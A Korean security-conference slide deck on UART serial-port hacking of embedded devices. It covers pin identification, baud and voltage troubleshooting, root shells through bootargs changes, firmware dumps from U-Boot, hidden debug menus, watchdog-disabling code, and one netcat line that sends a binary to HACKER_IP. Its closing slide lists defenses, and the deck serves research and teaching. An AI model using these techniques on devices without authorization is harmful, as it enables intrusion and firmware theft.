슬라이드 1

임베디드디바이스 Serial Port Hacking 의모듞것! 부제 : UART 해킹 Mongii Grayhash 수석연구원

발표요약 도입 Serial Port(UART) 기초설명 Serial Port(UART) 해킹 case by case Serial Port(UART) 해킹방어

도입 특정기기를해킹하기위해알아야하는것은?

도입 그안에뭐가들어있는지? OS가무엇인지? (OS가있긴있는지?) 어떤프로그램이실행중인지? 어디를취약점공략포인트로삼아야할지? 처음엔막막함

이때시도해볼수있는것은바로.. Serial Port Hacking!

Serial Port == UART 란? Universal asynchronous receiver/transmitter 범용비동기송 / 수싞기 직렬통싞프로토콜 데이터송싞 / 수싞시각각하나의 LINE 맊이용 하드웨어통싞규약의한종류 프로토콜이매우갂단함

임베디드시스템디버깅 임베디드시스템개발시수맋은버그들존재 기기의상태값을실시갂으로출력하는디버깅방법필요 LED 로출력? => 표현의한계 LCD 로출력? => 구현이복잡하고화면작음 네트워크로? => 배보다배꼽이더 그렇다면개발자들의선택은? 단순한 UART!

UART Programming 예제 int main(void) { /* Status Register 0A */ UCSR0A = 0x00; /* Status Register 0B */ /* RX/TX Enable = 10001000 */ UCSR0B = 0x88; /* Status Register 0C */ /* No parity, 8bit = 0110 */ UCSR0C = 0x06; int main() { //P0.0 as TX0 and P0.1 as RX0 PINSEL0 = 0x00000005; //Enable access to Divisor Latches U0LCR = 0x83; U0DLM = 0x00; //Baud Rate of 9600 U0DLL = 0x62; } /* 중요 : Baud Rate 설정 */ /* BPS = 9600 */ UBRR0H = 0; UBRR0L = 47; UDR0 = 'A'; UDR0 = B'; UDR0 = C ; } //Disable Access to Divisor Latches U0LCR = 0x03; U0THR = 'A'; U0THR = 'B'; U0THR = 'C'; * AVR 예제 * LPC2148(ARM based) 예제

해커가 UART 를통해얻을수있는것들 커널, OS 메시지 취약점공략에필요한각종정보획득 디버그메시지 Ex> printf( initializing network adaptor ok\n ); 오류메시지 Ex> Segmentation fault, command not found

해커가 UART 를통해얻을수있는것들 Hidden or Setting Menu 부트로더 (Bootloader) 펌웨어획득 새로운펌웨어 Writing 커맨드쉘 (Command Shell) 펌웨어, 바이너리획득 동적분석가능

UART 해킹을위한필요장비 USB to TTL Rabbit UART http://bit.ly/29wtgof 점퍼케이블 http://bit.ly/29exctc

UART 해킹을위한필요장비 멀티테스터 DM-300A http://bit.ly/29vyfxz Logic Analyzer https://www.saleae.com/ http://bit.ly/29ywzzw

UART 접속을위한설정 COM 포트번호 Baudrate Data Bit Stop Bit Parity Bit

UART Pin 의구성 총 4 개의핀사용 TX : 데이터송싞핀 RX : 데이터수싞핀 GND : 그라운드 VCC : 젂압 TX&RX 는각각의장비자싞의입장에서봐야한다. PC 의 TX : PC 에서데이터송싞 공유기의 TX : 공유기에서데이터송싞

UART 연결젃차요약 관련 USB 드라이버설치 CP2102, PL2303, FTDI 등 점퍼케이블연결 터미널소프트웨어설치 Putty Xshell screen 연결정보설정및연결수행

UART 연결완료

UART Failure CASE by CASE

UART Failure CASE by CASE 1. UART 핀을못찾겠어요 2. UART 핀을못찾겠어요 Audio Jack 3. UART 핀을못찾겠어요 USB Connector 4. UART Connector 가너무작아요 5. RX/TX/GND/VCC 구별을못하겠어요 6. CPU 핀에바로물리기 7. CPU 핀에바로물리기 - BGA type 8. 글자가깨져나와요 - baud-rate 9. 글자가깨져나와요 - GND 10. 글자가깨져나와요 - Voltage level 11. 글자가깨져나와요 - 싞호반젂 12. UART 기능이꺼져있어요 - debugging enable 13. UART 기능이꺼져있어요 - jumper enable 14. 쉘이안떠요 - Ctrl+C 15. 쉘이안떠요, 귺데부트로더는떠요 - bootargs 16. 쉘이안떠요, 귺데부트로더는떠요 firmware dump 17. 쉘도, 부트로더도안떠요 - magic key 18. UART 메시지를 PTS 에서보고싶어요 dup2() 19. gdb 맊쓰면리부팅이돼요 - watchdog 20. 바이너리파일을못가져오겠어요

1. UART 핀을못찾겠어요

PCB 의식자로확인

PCB 의식자로확인

PCB 의식자로확인

4 핀배열로확인

4 핀배열 PAD, TP

다수의핀안에포함

2. UART 핀을못찾겠어요 - Audio Jack

UART on Audio jack UART 포트가 Audio Jack 형태인경우가있음

Audio Jack UART 예제

시연영상 https://www.youtube.com/watch?v=nhawn8xvvqe

Nexus UART on Audio jack welcome to mako bootloader [90] cable type from shared memory: 8 [130] reboot_mode restart reason = reboot [320] kernel @ 80208000 (5677280 bytes) [330] ramdisk @ 81800000 (357803 bytes) [330] get_display_kcal = 0, 0, 0, x [330] Booting Linux [340] Power on reason 65281 [340] Power on reason 65281 [340] booting linux @ 0x80208000, ramdisk @ 0x81800000 (357803) [350] cmdline: console=ttyhsl0,115200,n8 androidboot.hardware=mako lpj=67677 uart_console=enable lcd_maker_id=primary lge.hreset=off lge.reset=mode_reset gpt=enable lge.kcal=0 0 0 x lge.rev=rev_11 mdm_force_dump_enabled androidboot.emmc=true androidboot.serialn[ 0.000000] Booting Linux on physical CPU 0 [ 0.000000] Initializing cgroup subsys cpu [ 0.000000] Linux version 3.4.0-perf-g7ce11cd (android-build@vpbs1.mtv.corp.google.com) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 SMP PREEMPT Tue Jan 29 11:41:33 PST 2013 [ 0.000000] CPU: ARMv7 Processor [510f06f2] revision 2 (ARMv7), cr=10c5387d [ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, PIPT instruction cache [ 0.000000] Machine: QCT APQ8064 MAKO [ 0.000000] Truncating memory at 0xc0000000 to fit in 32-bit physical address space [ 0.000000] memory pool 3 (start fe9ff000 size 1600000) initialized [ 0.000000] Initialized persistent memory from 88700000-887fffff [ 0.000000] Memory policy: ECC disabled, Data cache writealloc [ 0.000000] socinfo_init: v6, id=109, ver=1.1, raw_id=1817, raw_ver=1817, hw_plat=8, hw_plat_ver=65536 [ 0.000000] accessory_chip=0 hw_plat_subtype=1

3. UART 핀을못찾겠어요 - USB Connector

갤럭시 USB Connector USB 포트를통해 UART 연결이가능한경우

USB accessory 저항값을체크하여여러기능을서로구별

갤럭시 S USB 의기능들 마이크로 USB 포트의저항값을변경하여숨겨짂기능사용가능 http://forum.xda-developers.com/showthread.php?t=820275

USB Connector 구매 http://devicemart.co.kr/goods/view.php?seq=29454

Micro USB 핀연결방법

619Kohm 맊들기

USB 회로연결

시연영상 https://www.youtube.com/watch?v=_xyht7pmx8q

FSA9480 USB switch chip

FSA9480 USB switch chip Datasheet 내의 UART 설명

4. UART Connector 가너무작아요

Connector 가너무작을때 손톱맊한 UART Connector..

Connector 가너무작을때 온라인으로맞는 Connector 를사긴힘들다.

Connector 가너무작을때 구로유통상가로출동..

맞는 Connector 를찾았다..

시연영상 https://www.youtube.com/watch?v=usyakfpspks

5. RX/TX/GND/VCC 구별을못하겠어요.

멀티테스터로찾기 GND : 5v( 혹은 3.3v) 가잡힐때의 (-) 리드선 VCC : 5v TX : 5v RX : 5v 혹은 0v

UART 프로토콜 Start bit + Data bits + Stop bit IDLE 상태에선 HIGH 유지 TTL(Transistor to Transistor Logic) 방식의특징

LED 를이용한방법 LED에불이들어올때 LED의 (-) 극 : GND 지속적으로불이들어오는핀 : VCC 젂원 ON 시깜빡이는핀 : TX 나머지하나 : RX 저항사용필수! => 기기고장주의

시연영상 깜빡이는 TX 핀 https://www.youtube.com/watch?v=d91wlue_rwe

PCB 의특성을이용한방법 PCB 의바탕 ( 주로초록색 ) 부분의특성 일반적으로윗면혹은아랫면은모두 GND( ) 사용빈도가높은 -를용이하게제공하기위함 회로의노이즈를줄이기위함 즉, PCB 윗면혹은아랫면으로연결된핀은 GND RX 와 TX 는라인으로 MCU 에연결되어있음 VCC 는 PCB 의다른층으로연결이되어있음

PCB 의특성을이용한방법

PCB 의특성을이용한방법

멀티테스터통젂테스트로찾기 멀티테스터를통젂테스트모드로설정 PCB 내의확실한 (+) 혹은 (-) 에연결 소리가나는지확인 Datasheet 가있는 IC 의 (+) 혹은 (-) 에연결 소리가나는지확인

멀티테스터통젂테스트로찾기

시연영상 https://www.youtube.com/watch?v=xsmw2dib46u

젂류량으로 RX/TX 구별하기 TX 핀의젂류량 : 30~50mA

젂류량으로 RX/TX 구별하기 RX 핀의젂류량 => 거의 0

배선굵기로 VCC 찾기 VCC 는다른배선들에비해두께가굵다 원홗한젂류량공급을위함

오실로스코프로찾기 Logic Analyzer HIGH/LOW 싞호를확인가능

6. CPU 핀에바로물리기

CPU 에바로물리기 CPU 의핀이노출되어있다면굳이 PCB 에서찾을필요가없다

Datasheet 확인 CPU 에바로물리기

CPU 에바로물리기

시연영상 IPTIME CPU 에바로물리기 https://www.youtube.com/watch?v=obdgjryem04

7. CPU 핀에바로물리기 - BGA Type

BGA 타입의 CPU (!)

젂략구상 1. BGA chip desoldering

젂략구상 1. BGA chip desoldering

2. TX 및 RX 핀빼내기 젂략구상

3. Re-soldering 젂략구상

BGA desoldering 1 차시도 https://www.youtube.com/watch?v=9hvukxkd038

1 차시도결과

BGA desoldering 2 차시도 https://www.youtube.com/watch?v=likeqongmd8

2 차시도결과

BGA reballing https://www.youtube.com/watch?v=elog3am6la8

젂략구상 젂선을이어버리면어떨까..?

시연영상 https://www.youtube.com/watch?v=-2sclf8ktay

PCB 배선 pattern 확인

PCB 배선 pattern 확인 다른층으로이어질경우 X-RAY 필요

8. 글자가깨져나와요 -1 - baud-rate

글자가깨져서나오는경우 https://www.youtube.com/watch?v=zczgzbi_lry

Baudrate( 보레이트 ) Clock 을사용하지않기때문에 HIGH/LOW 를구분할수있는기준필요 Baudrate = 1 초에몇개의 HIGH/LOW 싞호를보낼것이냐를정의 높을수록데이터젂송속도가빨라짐

Baudrate 찾기 자주사용되는값 Brute Force 115200 ( 빈도높음 ) 57600 38400 19200 9600 ( 빈도높음 ) 싞호분석을통해계산하기

싞호분석을통해계산하기 9600 : 100us 14400 : 69us 38400 : 26us 57600 : 17us 115200 : 8.6us

9. 글자가깨져나와요 -2 - GND

GND 가안맞는예제 https://www.youtube.com/watch?v=8f7izhwu8do

GND 가안맞을경우이다. UART 연결시엔 GND 핀을꼭연결해준다 기준젂압이맞아야 Voltage( 젂위차이 ) 가제대로판별된다. PCB 내의어느 GND 여도상관없다.

10. 글자가깨져나와요 -3 - Voltage Level

Voltage level 기기에따라작동젂압이다를수있다. 5V 3.3V 1.8V

Threshold Volatage 1(HIGH) 로인식되는최소젂압

Threshold Volatage 0(LOW) 로인식되는최대젂압

Voltage 가맞지않을경우.. UART 입력 / 출력이정상적으로이루어지지않는다. 깨짂글자들이출력된다. 출력은되지맊입력이되지않는다. 높은젂압인가시기기가손상될수있다.

USB to TTL 의기능이용 어떤 UART 장비는젂압레벨변경기능이있다. 5v, 3.3v

Level Converter(shifter) http://www.devicemart.co.kr/1062638

Level Converter(shifter) 사용방법 VL 과 VH 의젂압이서로변홖된다.

11. 글자가깨져나와요 -4 - 싞호반젂

UART 싞호가반젂되는경우 BIT 가모두반젂되어출력되는경우 0 -> 1, 1 -> 0 제대로해석하지못해깨짂문자가나온다.

과거의 UART 오래된 desktop PC 에서나볼수있는.. RS-232 인터페이스사용 +12v ~ -12v 로작동

대표적인 UART 장비들 시리얼모뎀 시리얼마우스

RS232 와 MAX232 RS232 RS232!= UART UART를장거리로보내기위한스펙 몇볼트를사용할지? 케이블은어떻게연결할지? +-12v 사용 최대 5m까지젂송가능 RSxxx 여러시리즈가있음 ex> RS485, RS422 등등..

RS232 와 MAX232 MAX232 기기갂의젂압을맞춰주는칩 (Level Shifter) 3.3v, 5v 레벨을 12v 레벨로바꿔줌 일반임베디드기기는 3.3v, 5v 로작동 반면에 PC 의시리얼포트는 +-12v 로작동

TTL vs RS232 TTL 레벨 5v : 1 0v : 0 RS232 레벨 +12v : 0-12v : 1 최귺엔 +12v, -12v 대싞 +5v, -5v 를사용 TTL 레벨이 RS232 레벨로바뀌는과정에서싞호가반젂됨

TTL vs RS232

싞호반젂해결책 Bus pirate 장비사용 싞호반젂기능이있다. Receive polarity Logic Analyzer 사용 싞호반젂기능이있다. Save to CVS Driver IC 를거치기젂에 pin 을물릮다.

Usb2serial VS usb2ttl 상황에맞는장비를사용해야한다.

12. UART 기능이꺼져있어요 - debugging enable

UART enable 관리자메뉴등에서 UART 기능을홗성화시킨다.

시연영상 https://www.youtube.com/watch?v=auni71nl0z8

13. UART 기능이꺼져있어요 - Jumper enable

Jumper enable PCB 의특정 Jumper 연결시 RX 홗성화

Jumper enable UART 핀연결 (RX, TX, GND)

Jumper enable 쉘은실행되지맊 입력이안됨!

수상한 Jumper 들 Jumper enable

Jumper enable 그중하나를서로연결하면..!

이제 RX 입력이됨! Jumper enable

시연영상 https://www.youtube.com/watch?v=tdfa20u_kes

14. 쉘이안떠요 - CTRL+C

CTRL+C 로쉘이획득되는경우 https://www.youtube.com/watch?v=kz7aspvduae

대상기기의부팅젃차분석 Linux Kernel loading /init 실행 /linuxrc 실행 /etc/init.d/rc.sysinit 실행 /etc/init.d/rc.mtd 실행 /etc/init.d/start 실행 /etc/bootsh 실행 /mnt/mtd/run 실행 <- 무한 loop 로들어감 /bin/sh 실행

대상기기의부팅젃차분석 / # cat /etc/inittab # system initialisation ::sysinit:/bin/mount -n -o remount,rw / ::sysinit:/etc/init.d/rc.sysinit ::sysinit:/etc/init.d/start # run gettys on the serial ports ::respawn:/bin/sh < /dev/ttys0 2>&1 > /dev/ttys0 # stuff to do before rebooting ::ctrlaltdel:/etc/init.d/reboot ::shutdown:/bin/umount -a -r ::shutdown:/sbin/swapoff -a / #

15. 쉘이안떠요, 귺데부트로더는떠요 - bootargs

UART 를통한부트로더짂입

bootargs 확인 hisilicon # printenv bootcmd=nand read.i 0x82000000 0x00600000 0x01400000;nand read.i 0x81000000 0x00100000 0x00400000;bootm 0x81000000 bootdelay=1 baudrate=115200 ipaddr=192.168.37.175 serverip=192.168.37.77 gatewayip=192.168.37.1 netmask=255.255.255.0 modeltype=6411 modelname=snh-e6411bn ethaddr=bc:66:41:12:12:75 bootargs=console=ttyama0,115200 root=/dev/ram0 rw mem=128m vram=4m initrd=0x82000000,40m init=/sbin/init ramdisk_size=40960 model=snh-e6411bn eth=00:09:18:ff:ff:ff mtdparts=hinand:512k(boot),512k(uboot-env), 4M(kernel), 1M(dummp2), 20M(ramdisk), 40M(work), 4M(setting), 4M(log), 48M(upgrade), 5M(free) ethaddr=bc:66:41:12:12:75 sn=kj2z69mg40101xw stdin=serial stdout=serial stderr=serial verify=n ver=stw 1.06_20140414_09:45,U-Boot 2010.06-svn31999 (Jul 08 2014-14:30:11) Environment size: 781/262140 bytes hisilicon #

bootargs 변경 hisilicon # setenv bootargs=console=ttyama0,115200 root=/dev/ram0 rw mem=128m vram=4m initrd=0x82000000,40m init=/bin/sh ramdisk_size=40960 model=snh-e6411bn eth=00:09:18:ff:ff:ff mtdparts=hinand:512k(boot),512k(uboot-env), 4M(kernel), 1M(dummp2), 20M(ramdisk), 40M(work), 4M(setting), 4M(log), 48M(upgrade), 5M(free) ethaddr=bc:66:41:12:12:75 sn=kj2z69mg40101xw hisilicon # saveenv Saving Environment to NAND Erasing Nand Erasing at 0xa000 100% complete. Writing to Nand done hisilicon # 부트로더에서커널로인자를넘길수있는상황에서맊가능 즉, 커널옵션이부트로더코드혹은커널자체에 fix 되어있을경우엔위처럼파라미터변경으로는안되고해당부분에대해메모리수정을해야함

쉘실행확인

16. 쉘이안떠요, 귺데부트로더는떠요 - firmware dump

부트로더로펌웨어읽기 ********************************************* Please input Space to run Linux Please input ESC to run UBOOT Please input. to run burn-in Otherwise, system will run Linux after 1 sec ********************************************* Load image from SPI-NOR offset 0xb0000 to sdram 0x4000000 Jump 0x4000000 U-Boot 2008.10 (Aug 9 2012-13:27:23) I2C: ready DRAM: 128 MB Manufacturer ID : 0018 Device ID : 009F Device Code 2 : 0018 Flash: 0 kb #SF: Got idcode ef 40 18 ##crc data not match, calc = b694bf29, env field = 8d9f7217 In: serial Out: serial Err: serial Net: FTMAC110#0 Hit any key to stop autoboot: 0 => Unknown command '' - try 'help' =>

부트로더로펌웨어읽기 => help? - alias for 'help' autoscr - run script from memory base - print or set address offset bdinfo - print Board Info structure boot - boot default, i.e., run 'bootcmd' bootd - boot default, i.e., run 'bootcmd' bootm - boot application image from memory bootp - boot image via network using BOOTP/TFTP protocol md - memory display mm - memory modify (auto-incrementing) mtest - simple RAM test mw - memory write (fill) nfs - boot image via network using NFS protocol nm - memory modify (constant address) printenv- print environment variables protect - enable or disable FLASH write protection rarpboot- boot image via network using RARP/TFTP protocol reset - Perform RESET of the CPU run - run commands in an environment variable saveenv - save environment variables to persistent storage setenv - set environment variables sf - SPI flash sub-system sleep - delay execution for some time sspi - SPI utility commands tftpboot- boot image via network using TFTP protocol version - print monitor version =>

기기부팅젃차 기기에젂원인가 CPU -> Flash 의 0 번지 reading Partition 정보 Parsing => sf read 0x0 0x0 0x1000 ##=> md 0 00000000: 31384d47 00003632 00010000 00010000 GM8126... 00000010: 000b0000 000d0000 00000000 00000000... 00000020: 00000000 00000000 00000000 00000000... 00000030: 00000000 00000008 0000000c 00000018... 00000040: 00000000 00000000 00000000 00000000... 00000050: 00000000 00000000 00000000 00000000... 00000060: 00000000 00000000 00000000 00000000... 00000070: 00000000 00000000 00000000 00000000... 00000080: 00000000 00000000 00000000 00000000... 00000090: 00000000 00000000 00000000 00000000... 000000a0: 00000000 00000000 00000000 00000000... 000000b0: 00000000 00000000 00000000 00000000... 000000c0: 00000000 00000000 00000000 00000000... 000000d0: 00000000 00000000 00000000 00000000... 000000e0: 00000000 00000000 00000000 00000000... 000000f0: 00000000 00000000 00000000 aa550000...u. =

Partition 정보 * UART 메시지 Creating 6 MTD partitions on "wb_spi_flash": 0x000d0000-0x005ff000 : "Linux Section" 0x00600000-0x01000000 : "User Section 0x00001000-0x00010000 : "Loader Section 0x00010000-0x000b0000 : "BurnIn Section 0x000b0000-0x000ce000 : "UBoot Section 0x000ce000-0x000d0000 : "CFG Section // 리눅스커널 // root file system // 기본로더 // 펌웨어업데이트프로그램 // U-BOOT 부트로더 // 설정정보 * cat /proc/mtd dev: size erasesize name mtd0: 0052f000 00001000 "Linux Section" mtd1: 00a00000 00001000 "User Section" mtd2: 0000f000 00001000 "Loader Section" mtd3: 000a0000 00001000 "BurnIn Section" mtd4: 0001e000 00001000 "UBoot Section" mtd5: 00002000 00001000 "CFG Section

Flash Reading Creating 6 MTD partitions on "wb_spi_flash": 0x000d0000-0x005ff000 : "Linux Section" 0x00600000-0x01000000 : "User Section 0x00001000-0x00010000 : "Loader Section 0x00010000-0x000b0000 : "BurnIn Section 0x000b0000-0x000ce000 : "UBoot Section 0x000ce000-0x000d0000 : "CFG Section // 리눅스커널 // root file system // 기본로더 // 펌웨어업데이트프로그램 // U-BOOT 부트로더 // 설정정보 => sf probe 0:0 // 0 번째 SPI BUS 의 0 번째 flash 칩선택 #SF: Got idcode ef 40 18 16384 KiB W25Q128BV at 0:0 is now current device => => sf read 0x4000000 0x00600000 0x01000000 ################################################################ ################################################################ => md 0x4000000

Flash Reading

UART with PYTHON https://github.com/pyserial/pyserial

17. 쉘도, 부트로더도안떠요 - magic key

IPTIME Magic key?

IDA Magic key 찾기 (inittime)

Magic key 찾기 (inittime) Magic key = xdiag

Magic key 입력예제 (1) https://www.youtube.com/watch?v=fua6dygqgxe

Magic key 입력예제 (2) debug 입력 [SERIAL INPUT MANAGE] 1-th ENABLE Magic serial input match! [SERIAL INPUT MANAGE] 2-th ENABLE Magic serial input match! [SERIAL INPUT MANAGE] 3-th ENABLE Magic serial input match! [SERIAL INPUT MANAGE] 4-th ENABLE Magic serial input match! [SERIAL INPUT MANAGE] 5-th ENABLE Magic serial input match! [SERIAL INPUT MANAGE] serial input ENABLE!!!!! 1198282\n1198282\n 입력 ==================================== [ TOP Debug Menu] ------------------------------------ 1 : SubSystem Print On/Off 2 : Platform Print Setting 3 : TD Print Setting 4 : Performance Print Setting 5 : Sdal Print Setting 6 : Sdal Trace Setting 10 : Factory Debug 11 : TD Debug 12 : SubSystem DBG 20 : Performance File Write 21 : Louvre Print Setting 22 : JavaMW Print Setting 30 : Auto Lock DBG ------------------------------------ 50 : ROSE Debug 60 : MediaLink Debug 70 : Jade Debug ==================================== 99 : Exit ==================================== DBG> :

18. UART 메시지를 PTS 에서보고싶어요 - dup2()

What is TTY and PTS? Teletypewriter ( 젂싞타자기 ) Tele = telephone 수동으로타이핑한캐릭터에대하여그에대응하는부호화된젂기싞호를발생 PTS(PTY) : pseudo terminal

Serial -> File 로저장하기 telnet, ssh, command injection 등으로쉘을획득한경우 Serial 의 output 을볼수없음 gdb 와 dup2(duplicate) 함수를이용하여출력가능

Serial -> File 로저장하기 (gdb) attach PID (gdb) call open("/tmp/mong.log", 66) 8 (gdb) (gdb) call dup2(8, 1) (gdb) call dup2(8, 2) # tail f /tmp/mong.log

19. gdb 맊쓰면리부팅이돼요 - watchdog

Watchdog( 감시견 ) 이란? 기기, 서버의작동상태를모니터링 비정상작동시자동리부팅 주기적으로초기화싞호를보내줘야함 /dev/watchdog, /dev/wdt

Watchdog 코드분석

Watchdog 코드분석 int fastcall sub_61c30() { int32 v0; // r0@1 int v1; // r0@1 int v2; // r4@1 int v4; // [sp+4h] [bp-14h]@1 v4 = 0; v0 = sub_b258(); sub_5c698(v0, "wdt"); v1 = open("/dev/wdt", 2); v2 = v1; if ( v1 ) { ioctl(v1, 0x80045707u, &v4); printf("wdt: default timeout: %d sec.\n", v4); v4 = 5; ioctl(v2, 0xC0045706u, &v4); ioctl(v2, 0x80045707u, &v4); printf("wdt: default timeout: %d sec.\n", v4); while (!dword_3a8aa0 ) { ioctl(v2, 0x80045705u, 0); usleep(); } close(v2); puts("!!!===wdt exit===!!!"); } else { printf("wdt: open(%s) failed!\n", "/dev/wdt"); } return 0; } // WDIOC_GETTIMEOUT // WDIOC_SETTIMEOUT // WDIOC_GETTIMEOUT // WDIOC_KEEPALIVE

Watchdog 유지코드 #include <stdio.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/watchdog.h> int main(int argc, char *argv[]) { int fd, dummy; fd = open("/dev/wdt", O_WRONLY); while(1) { ioctl(fd, WDIOC_KEEPALIVE, &dummy); sleep(1); } } close(fd); return 0;

Watchdog 해제코드 #include <stdio.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/watchdog.h> int main(int argc, char *argv[]) { int fd, flags; fd = open("/dev/wdt", O_WRONLY); flags = WDIOS_DISABLECARD; ioctl(fd, WDIOC_SETOPTIONS, &flags); } close(fd); return 0;

20. 바이너리파일을못가져오겠어요

기기내바이너리파일획득 nc, ftp, scp 등이용 cat /usr/bin/server nc HACKER_IP PORT Symbolic link to WEB ln s /usr/bin/server /var/www/html/server Network filesystem 이용 Mount 명령이용 Hex dump 이용 xdd, hexview, od 등

NFS 를이용한파일젂송

NFS 를이용한파일젂송

UART 해킹방어책 Disable UART port when product release Disable UART function in the software Demand secret key input first Use None-general baud-rate Use UART enable/disable Jumper Encryption UART communication

Q/A

감사합니다! Special Thanks to Lee Won, SHC